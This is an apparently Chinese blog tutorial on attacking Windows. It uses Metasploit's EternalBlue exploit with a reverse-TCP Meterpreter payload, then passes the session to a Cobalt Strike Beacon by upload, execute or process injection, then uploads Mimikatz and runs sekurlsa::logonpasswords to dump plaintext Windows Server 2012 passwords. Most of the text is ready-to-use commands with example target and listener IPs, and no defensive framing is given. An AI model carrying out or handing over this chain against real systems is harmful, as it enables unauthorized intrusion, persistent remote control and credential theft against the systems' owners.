cs与msf权限传递,以及mimikatz抓取win2012明文密码

Cobalt Strike与Metasploit Framework权限传递

Cobalt Strike和Metasploit Framework可以通过以下步骤进行权限传递:

  1. 建立会话:

    • 在Metasploit中使用漏洞利用模块(exploit)获取目标系统的会话(session)。
      例如:
      use exploit/windows/smb/ms17_010_eternalblue
      set RHOSTS <target_ip>
      set PAYLOAD windows/x64/meterpreter/reverse_tcp
      set LHOST <your_ip>
      run
      
  2. 会话转移到Cobalt Strike:
    在Metasploit中获取会话后,可以通过以下步骤转移该会话到Cobalt Strike:
    在Cobalt Strike中生成一个反向TCP Beacon Payload。
    在Metasploit中使用meterpreter会话,将Cobalt Strike生成的Payload注入到目标系统中以建立Cobalt Strike Beacon。

    meterpreter> upload <cobalt_strike_beacon_payload>
    meterpreter> execute -f <cobalt_strike_beacon_payload>
    

    或者直接通过psinject模块将Cobalt Strike的Beacon注入到运行的进程中。

    meterpreter> psinject <pid> <cobalt_strike_beacon_payload>
    

使用Mimikatz抓取Windows Server 2012明文密码

Mimikatz是一个强大的工具,可以在Windows系统上提取明文密码、哈希、PIN码等。以下是在Windows Server 2012上使用Mimikatz抓取明文密码的步骤:

  1. 获取系统权限:
    首先,确保你在目标系统上具有管理员权限或SYSTEM权限。

  2. 下载并运行Mimikatz:
    将Mimikatz上传到目标系统并使用管理员权限执行它。

    meterpreter> upload mimikatz.exe
    meterpreter> execute -f mimikatz.exe -i
    
  3. Dump密码:
    在Mimikatz命令行中,使用以下命令抓取明文密码:

    privilege::debug
    sekurlsa::logonpasswords
    

示例操作

假设我们已经使用Metasploit获取了目标系统的Meterpreter会话,并且需要将会话转移到Cobalt Strike,然后使用Mimikatz抓取明文密码。

  1. 在Metasploit中获取会话:

    msf5 > use exploit/windows/smb/ms17_010_eternalblue
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.200
    msf5 exploit(windows/smb/ms17_010_eternalblue) > run
    
  2. 将会话转移到Cobalt Strike:
    在Cobalt Strike中生成Beacon Payload。
    上传并执行Payload,实现会话转移。

  3. 使用Mimikatz抓取明文密码:
    在Cobalt Strike的Beacon中,上传并执行Mimikatz。

    beacon> upload mimikatz.exe
    beacon> shell mimikatz.exe
    
    • 在Mimikatz中执行抓取密码的命令:
      mimikatz # privilege::debug
      mimikatz # sekurlsa::logonpasswords
      
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值